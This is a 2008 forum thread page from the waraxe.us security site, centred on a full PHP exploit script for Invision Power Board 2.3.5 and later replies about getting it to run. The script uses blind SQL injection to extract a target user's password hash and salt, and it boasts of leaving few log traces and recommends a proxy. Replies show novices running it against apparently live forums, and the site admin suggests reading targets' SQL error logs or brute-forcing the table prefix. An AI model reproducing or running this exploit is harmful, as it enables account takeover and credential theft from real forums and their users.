Login or Register :: Home :: Search :: Your Account :: Forums :: Waraxe Advisories :: Tools :: November 17, 2024 Menu Home Logout Discussions Forums Members List IRC chat Tools Base64 coder MD5 hash CRC32 checksum ROT13 coder SHA-1 hash URL-decoder Sql Char Encoder Affiliates y3dips ITsec Md5 Cracker User Manuals AlbumNow Content Content Sections FAQ Top Info Feedback Recommend Us Search Journal Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9144 People Online: Visitors: 67 Members: 0 Total: 67 Full disclosure SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879) Security issue in the TX Text Control .NET Server for ASP.NET. SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater Unsafe eval() in TestRail CLI 4 vulnerabilities in ibmsecurity 32 vulnerabilities in IBM Security Verify Access xlibre Xnest security advisory & bugfix releases APPLE-SA-10-29-2024-1 Safari 18.1 SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600) SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333) APPLE-SA-10-28-2024-8 visionOS 2.1 APPLE-SA-10-28-2024-7 tvOS 18.1 APPLE-SA-10-28-2024-6 watchOS 11.1 APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1 APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1 IT Security and Insecurity Portal www.waraxe.us Forum Index -> Invision Power Board -> IPB <= 2.3.5 sql injection hash/salt fetching exploit Goto page Previous1, 2, 3, 4, 5Next View previous topic :: View next topic Posted: Sun Oct 05, 2008 7:19 am SnIpEr Active user Joined: Sep 25, 2008 Posts: 37 Well here's the problem. I know how to run it now, but I keep getting this error: Anyone know how to fix this? Posted: Tue Oct 07, 2008 6:20 pm mairh Beginner Joined: Oct 07, 2008 Posts: 1 guys because i am a noob can you tell me how can i use that exploit? Re: IPB <= 2.3.5 sql injection hash/salt fetching exploit Posted: Thu Oct 16, 2008 1:35 am devildavid Regular user Joined: Oct 16, 2008 Posts: 6 waraxe wrote: Based on DarkFig's excellent advisory. Easy to use, fast and usually does leave minimal log traces. Feedback is welcome! [[update]] ==> version 1.1 with Curl autoload! Code: <?php error_reporting(E_ALL); /////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////// // IPB <= 2.3.5 sql injection exploit // Version 1.1 // written by Janek Vind "waraxe" // Estonia, Tartu // http://www.waraxe.us/ // 22. september 2008 // based on DarkFig's advisory // http://acid-root.new.fr/?0:18 // // FEATURES: // 1. Fetching algorithm optimized for speed // 2. Attack goes through $_POST, so no suspicious logs // 3. Pretesting saves time if IPB is not vulnerable // 4. curl extension autoloading // // More useful tools: http://www.waraxe.us/tools/ // Waraxe forums: http://www.waraxe.us/forums.html // // NB! This exploit is meant to be run as php CLI! // http://www.php.net/features.commandline /////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////// //===================================================================== $url = 'http://localhost/ipb.2.3.5/'; $id = 1;// ID of the target user, default value "1" is admin's ID $prefix = 'ibf_';// IPB table prefix, default is "ibf_" # Proxy settings # Be sure to use proxy :) //$proxy_ip_port = '127.0.0.1:8118'; //$proxy_user_password = 'someuser:somepassword'; $outfile = './ipblog.txt';// Log file //====================================================================== /////////////////////////////////////////////////////////////////////// // Don't mess below this line, unless you know the stuff ;) /////////////////////////////////////////////////////////////////////// //===================================================================== /////////////////////////////////////////////////////////////////////// if(!extension_loaded('curl')) { if(!dl('php_curl.dll')) { die("Curl extension not loaded!\n Fatal exit ...\n"); } else { echo "Curl loading success\n"; } } //===================================================================== $cli = php_sapi_name() === 'cli'; //===================================================================== // Warning, if executed from webserver //===================================================================== if(!$cli) { if(!isset($_REQUEST['wtf-is-cli'])) { echo "<html><head><title>Attention!</title></head>\n"; echo "<body><br /><br /><center>\n"; echo "<h1>Warning!</h1>\n"; echo "This exploit is meant to be used as php CLI script!<br />\n"; echo "More information:<br />\n"; echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n"; echo "Still, you can try to run it from webserver.<br />\n"; echo "Just press the button below and prepare for long waiting<br />\n"; echo "And learn to use php CLI next time, please ...<br />\n"; echo "<form method=\"get\">\n"; echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n"; echo "</form>\n"; echo "</center></body></html>\n"; exit; } else { // Let's try to maximize our chances without CLI @set_time_limit(0); } } //===================================================================== xecho("Target: $url\n"); xecho("Sql table prefix: $prefix\n"); xecho("Testing target URL ... \n"); test_target_url(); xecho("Target URL seems to be valid\n"); xecho("Testing target ID ... \n"); test_target_id(); xecho("Target ID seems to be valid\n"); $hash = get_hash(); $salt = get_salt(); add_line("Target: $url"); add_line("User ID: $id"); add_line("Hash: $hash"); add_line("Salt: $salt"); add_line("------------------------------------------"); xecho("\n------------------------------------------\n"); xecho("Hash: $hash\n"); xecho("Salt: $salt"); xecho("\n------------------------------------------\n"); xecho("\nQuestions and feedback - http://www.waraxe.us/ \n"); die("See ya! :) \n"); ////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////// function test_target_url() { global $url; $post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- '; $buff = trim(make_post($url, $post, '', $url)); if($buff !== 'found') { die('Invalid response, target URL not valid? Exiting ...'); } } ////////////////////////////////////////////////////////////////////// function test_target_id() { global $url, $prefix, $id; $post = 'UNION SELECT 1,1 FROM ' . $prefix . 'members_converge WHERE converge_id=' . $id . ' AND LENGTH(converge_pass_hash)=32'; if(!test_condition($post)) { die('Invalid response, target ID not valid? Exiting ...'); } } /////////////////////////////////////////////////////////////////////// function get_salt() { $len = 5; $out = ''; xecho("Finding salt ...\n"); for($i = 1; $i < $len + 1; $i ++) { $ch = get_saltchar($i); xecho("Got pos $i --> $ch\n"); $out .= "$ch"; xecho("Current salt: $out \n"); } xecho("\nFinal salt: $out\n\n"); return $out; } /////////////////////////////////////////////////////////////////////// function get_saltchar($pos) { global $prefix, $id; $char = ''; $min = 32; $max = 128; $pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_salt,$pos,1))"; $curr = 0; while(1) { $area = $max - $min; if($area < 2 ) { $post = $pattern . "=$max"; $eq = test_condition($post); if($eq) { $char = chr($max); } else { $char = chr($min); } break; } $half = intval(floor($area / 2)); $curr = $min + $half; $post = $pattern . '%253e' . $curr; $bigger = test_condition($post); if($bigger) { $min = $curr; } else { $max = $curr; } xecho("Current test: $curr-$max-$min\n"); } return $char; } /////////////////////////////////////////////////////////////////////// function get_hash() { $len = 32; $out = ''; xecho("Finding hash ...\n"); for($i = 1; $i < $len + 1; $i ++) { $ch = get_hashchar($i); xecho("Got pos $i --> $ch\n"); $out .= "$ch"; xecho("Current hash: $out \n"); } xecho("\nFinal hash: $out\n\n"); return $out; } /////////////////////////////////////////////////////////////////////// function get_hashchar($pos) { global $prefix, $id; $char = ''; $pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_hash,$pos,1))"; // First let's determine, if it's number or letter $post = $pattern . '%253e57'; $letter = test_condition($post); if($letter) { $min = 97; $max = 102; xecho("Char to find is [a-f]\n"); } else { $min = 48; $max = 57; xecho("Char to find is [0-9]\n"); } $curr = 0; while(1) { $area = $max - $min; if($area < 2 ) { $post = $pattern . "=$max"; $eq = test_condition($post); if($eq) { $char = chr($max); } else { $char = chr($min); } break; } $half = intval(floor($area / 2)); $curr = $min + $half; $post = $pattern . '%253e' . $curr; $bigger = test_condition($post); if($bigger) { $min = $curr; } else { $max = $curr; } xecho("Current test: $curr-$max-$min\n"); } return $char; } /////////////////////////////////////////////////////////////////////// function test_condition($p) { global $url; $bret = false; $maxtry = 10; $try = 1; $pattern = 'act=xmlout&do=check-display-name&name=%%2527 OR 1=%%2522%%2527%%2522 %s OR 1=%%2522%%2527%%2522-- '; $post = sprintf($pattern, $p); while(1) { $buff = trim(make_post($url, $post, '', $url)); if($buff === 'found') { $bret = true; break; } elseif($buff === 'notfound') { break; } elseif(strpos($buff, '<title>IPS Driver Error</title>') !== false) { die("Sql error! Wrong prefix?\nExiting ... "); } else { xecho("test_condition() - try $try - invalid return value ...\n"); $try ++; if($try > $maxtry) { die("Too many tries - exiting ...\n"); } else { xecho("Trying again - try $try ...\n"); } } } return $bret; } /////////////////////////////////////////////////////////////////////// function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE) { $ch = curl_init(); $timeout = 120; curl_setopt ($ch, CURLOPT_URL, $url); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0); curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)'); if(!empty($GLOBALS['proxy_ip_port'])) { curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']); if(!empty($GLOBALS['proxy_user_password'])) { curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']); } } if(!empty($cookie)) { curl_setopt ($ch, CURLOPT_COOKIE, $cookie); } if(!empty($referer)) { curl_setopt ($ch, CURLOPT_REFERER, $referer); } if($headers === TRUE) { curl_setopt ($ch, CURLOPT_HEADER, TRUE); } else { curl_setopt ($ch, CURLOPT_HEADER, FALSE); } $fc = curl_exec($ch); curl_close($ch); return $fc; } /////////////////////////////////////////////////////////////////////// function add_line($line) { global $outfile; $line .= "\n"; $fh = fopen($outfile, 'ab'); fwrite($fh, $line); fclose($fh); } /////////////////////////////////////////////////////////////////////// function xecho($line) { if($GLOBALS['cli']) { echo "$line"; } else { $line = nl2br(htmlspecialchars($line)); echo "$line"; } } ////////////////////////////////////////////////////////////////////// ?> still i dont understand how to use the exploit any deep explain? Posted: Sun Oct 19, 2008 9:20 am CygniX Beginner Joined: Oct 19, 2008 Posts: 3 Weird error. I get this every time: what's with this? I have tested the forum, and the IPS error thrown up means that it's vulnerable. But this output = whyyyy? Code: Target: http://someforum Sql table prefix: ibf_ Testing target URL ... Target URL seems to be valid Warning: fopen(ipblog.txt) [function.fopen]: failed to open stream: Permission denied in /home/ryu/public_html/ipbsingleuser.php on line 402 Warning: fwrite(): supplied argument is not a valid stream resource in /home/ryu/public_html/ipbsingleuser.php on line 403 Warning: fclose(): supplied argument is not a valid stream resource in /home/ryu/public_html/ipbsingleuser.php on line 404 Notice: Undefined variable: i in /home/ryu/public_html/ipbsingleuser.php on line 102 Warning: fopen(ipblog.txt) [function.fopen]: failed to open stream: Permission denied in /home/ryu/public_html/ipbsingleuser.php on line 402 Warning: fwrite(): supplied argument is not a valid stream resource in /home/ryu/public_html/ipbsingleuser.php on line 403 Warning: fclose(): supplied argument is not a valid stream resource in /home/ryu/public_html/ipbsingleuser.php on line 404 ------------------------------------------ User ID: 163376 Hash: ffffffffffffffffffffffffffffffff Salt: €€€€€ ------------------------------------------ Warning: fopen(ipblog.txt) [function.fopen]: failed to open stream: Permission denied in /home/ryu/public_html/ipbsingleuser.php on line 402 Warning: fwrite(): supplied argument is not a valid stream resource in /home/ryu/public_html/ipbsingleuser.php on line 403 Warning: fclose(): supplied argument is not a valid stream resource in /home/ryu/public_html/ipbsingleuser.php on line 404 Questions and feedback - http://www.waraxe.us/ See ya! :) Posted: Sun Oct 19, 2008 11:15 am waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu Like error message says, script does not have write permissions in current directory. So you can just disable logging functionality by commenting out some lines in php code. Posted: Sun Oct 19, 2008 1:48 pm CygniX Beginner Joined: Oct 19, 2008 Posts: 3 How about the wrong hash and salt given? Posted: Sun Oct 19, 2008 2:05 pm waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu CygniX wrote: How about the wrong hash and salt given? Well, my script makes two prechecks, one for URL and one for userID. And if one of them fails, then execution will be stopped. So this seems to be some kind of patch or custom IPB code modification, which makes exploit pass pretests and then fail hash fetching. If you are sure, that target is still vulnerable (you can produce sql error?), then you need manually make blind sql injection tests and find out possible exploitability. Maybe you need your own custom exploit or just try to modify original exploit so it will work. Posted: Mon Oct 20, 2008 12:46 am CygniX Beginner Joined: Oct 19, 2008 Posts: 3 Oh. Ok, thanks! I'll try that. Posted: Sun Oct 26, 2008 7:09 pm mattoni Active user Joined: Oct 26, 2008 Posts: 34 Location: United Kingdom that does mean allready pacthed ? Posted: Wed Nov 05, 2008 6:59 pm charlis Beginner Joined: Nov 05, 2008 Posts: 1 Sql table prefix: ibf_ Testing target URL ... Target URL seems to be valid Testing ID 1 ID 1 not valid, passing ... Testing ID 2 ID 2 validated Finding hash ... Sql error! Wrong prefix? it looks like prefix is working.. Then maybe site is patched?(passed admin) Any way to deal with already patched site? OR just wrong prefix? If so, any way to get prefix? Thanks. Posted: Wed Nov 05, 2008 8:32 pm waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu Probably wrong prefix. You can try to look at sql error log: Code: http://***/cache/sql_error_log_09_24_08.cgi Just use current date in file name. And ... some servers are showing cgi files as plain text, but others will give you error 500 or 403 ... Another option is to either bruteforce prefix or use information_schema. But it means, that you have to add additional functionality to the exploit Posted: Tue Nov 11, 2008 2:37 pm wUK Beginner Joined: Nov 11, 2008 Posts: 2 I get the following error when trying this: Quote: The application has failed to start because php4tl.dll was not found. I didn't have php_curl.dll to start with but found it online so I'm guessing that's not the way. Posted: Wed Nov 12, 2008 1:54 am _mranderson_ Valuable expert Joined: Oct 30, 2008 Posts: 51 google curl download and install it, it's that easy Posted: Sat Dec 13, 2008 11:07 am almostwOw Beginner Joined: Dec 10, 2008 Posts: 4 Can you learn me how to use this script or something I'm Noob Posted: Sat Dec 13, 2008 3:03 pm gyan007 Advanced user Joined: Oct 17, 2008 Posts: 106 almostwOw wrote: Can you learn me how to use this script or something I'm Noob Google executing php script. The exploit is php. IPB <= 2.3.5 sql injection hash/salt fetching exploit www.waraxe.us Forum Index -> Invision Power Board You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum All times are GMT Page 4 of 5 Goto page Previous1, 2, 3, 4, 5Next All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 YearOldest FirstNewest First Select a forumSecurity Research by waraxe----------------General discussionHow to fixMetasploit relatedHash cracking requests----------------MD5 hashesAll other hashesHash related informationhttp://www.waraxe.us portal----------------SuggestionsCooperation proposalsSecurity bugs and issues in general----------------Newbies cornerSql injectionCross-site scripting aka XSSRemote file inclusionFull path disclosureShell commands injectionPhishing and Social EngineeringAll other security holesVarious software----------------PhpNukePostNukePhpBBXMB forumvBulletin BoardInvision Power Boarde107MamboJoomlaXOOPSM$ WindowsLinux worldAll other softwareCoppermine Photo GalleryProgramming languages----------------PhpMySqlPerlJavaJavascriptC and C++Visual BasicBorland Delphi and PascalPythonHTML and XMLAssemblerReverse engineering----------------Newbies cornerDisassemblingPHP script decode requestsMiscellaneous stuff----------------Future of the ITNanotechnologyFun cornerLinksTry2hack sitesProxy databaseDirect Downloads----------------ToolsTutorialsWordlistsRecycle Bin----------------Removed messagesOutdated posts Powered by phpBB © 2001-2008 phpBB Group

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.038 Seconds